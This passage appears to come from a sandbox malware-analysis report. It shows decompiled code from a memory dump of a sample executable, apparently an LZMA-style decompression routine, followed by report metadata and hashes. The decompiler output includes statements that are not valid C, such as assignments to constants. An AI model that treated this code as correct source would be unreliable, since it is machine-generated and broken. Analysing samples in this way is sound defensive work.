													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406409 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
